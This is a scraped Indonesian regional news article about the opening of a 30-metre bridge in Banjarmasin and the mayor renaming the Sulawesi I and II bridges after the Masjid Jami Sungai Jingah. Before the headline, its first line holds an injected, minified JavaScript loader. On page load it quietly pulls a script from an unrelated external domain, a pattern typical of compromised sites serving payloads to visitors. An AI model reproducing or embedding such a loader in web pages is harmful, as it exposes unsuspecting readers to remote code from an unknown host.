(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Jembatan Sulawesi I dan II Berganti Nama Menjadi Jembatan Masjid Jami Sungai Jingah


KANALKALIMANTAN.COM, BANJARMASINJembatan Sulawesi II resmi dipergunakan sejak Jumat (20/1/2023) pagi dan sudah bisa dilalui pengendara roda 2 maupun roda 4.

Jembatan tersebut membentang di atas Sungai Kuin (Antasan) yang menghubungkan Jalan Sulawesi, Pasar Lama, Banjarmasin Tengah dengan Jalan Masjid Jami, Antasan Kecil.

Sejumlah masyarakat turut menyaksikan pemotongan pita penanda dibukanya untuk umum jembatan yang memiliki bentang panjang 30 meter tersebut.

Ada hal yang menarik pada peresmian jembatan Sulawesi II, dimana Wali Kota Banjarmasin Ibnu Sina mengganti nama jembatan Sulawesi I dan II menjadi nama baru.

 

Wali Kota Banjarmasin Ibnu Sina. Foto: Rizki

Baca juga  : Dispersip Tanbu Pinjamkan 472 Eksemplar Buku ke Pojok Baca Lapas Batulicin

Awalnya dirinya meminta masukan nama yang tepat dari masyarakat dan Forkopimda yang hadir, setelah mendengar berbagai masukan disepakati bahwa Jembatan Sulawesi tersebut berubah nama menjadi Jembatan Masjid Jami Sungai Jingah.

“Dulu jembatan Sulawesi, karena ini ada I dan II, hari ini kita betasmiyah beasa (Memberi nama kembali, res), namanya menjadi Jembatan Masjid Jami Sungai Jingah,” kata Ibnu Sina usai peresmian.

Dengan berfungsinya jembatan yang menelan anggaran hingga Rp 15,3 miliar ini diharapkan Ibnu Sina dapat mengurai kemacetan yang sering terjadi di kawasan tersebut.

Mengingat kawasan Masjid Jami seiring dilaksanakan majelis ta’lim dan setiap tahun ada peringatan haul Guru Zuhdi yang pasti menimbulkan kemacetan di kawasan tersebut.

“Jembatan yang sudah diidam-idamkan ini mengurai kemacetan baik pada saat majelis di Masjid Jami ataupun juga ketika ada haul guru,” ungkapnya.

Baca juga : Diresmikan, Jembatan Sulawesi II Senilai Rp 15,3 Miliar Sudah Bisa Dilewati  

Wali Kota Banjarmasin juga memastikan, kontruksi bangunan yang baru diresmikan tersebut dapat bertahan hingga 50 tahun kedepan.

“Secara struktur umur bangunan ini usianya bisa mencapai 50 tahun,” katanya.

Selain pembanguan jembatan, penataan kawasan jembatan seperti pembangunan trotoar dan ruang terbuka hijau di bawah bangunan jembatan.

Dirinya berharap masyarakat sekitar dapat menjaga dan merawat Jembatan Masjid Jami Sungai Jingah tersebut dan fasilitas-fasilitas di sekitarnya.

“Bukan hanya jembatan yang kita buat tapi juga penataan kawasan, apalagi ini kawasan religi dan objek wisata,” katanya.

“Ruang terbuka hijau di bawah jembatan juga kita tata,” tutupnya. (Kanalkalimantan.com/rizki)

Reporter  :  rizki
Editor : bie


Desy Arfianty

Recent Posts

Lolos Verifikasi Jalur Calon Perseorangan Lalu Mundur Diri, Siap-siap Kena Sanksi

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru menggelar sosialisasi persiapan pencalonan bakal pasangan… Read More

3 jam ago

Hadapi Satu Wasaka Award, Bappedalitbang Banjar Kumpulkan SKPD Terkait

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar menggelar Rapat… Read More

4 jam ago

Bupati Banjar Serahkan Bonus untuk Kafilah Kabupaten Banjar, Segini Rinciannya

KANALKALIMANTAN.COM, MARTAPURA -  Pemerintah Kabupaten Banjar melakukan syukuran atas prestasi yang diraih kafilah Kabupaten Banjar,… Read More

4 jam ago

Proyek Trotoar Jalan Kemuning Langsung Drainase, Begini Respon Warga yang Pagarnya Kena Bongkar

KANALKALIMANTAN.COM, BANJARBARU - Proyek penataan Jalan Kemuning, Kecamatan Banjarbaru Selatan, Kota Banjarbaru, dengan penyedian trotoar… Read More

5 jam ago

35 Peserta Ikuti Bimtek Pengawasan Jalan dan Jembatan Dinas PUPR Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Provinsi Kalimantan Selatan (Kalsel) melalui Dinas Pekerjaan Umum dan Penataan Ruang… Read More

6 jam ago

H Muhidin Siap Lamar Semua Parpol, Incar Cagub Kalsel Gandeng Hasnur

KANALKALIMANTAN.COM, BANJARMASIN - Keinginan Ketua Umum Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN) Kalimantan… Read More

7 jam ago

This website uses cookies.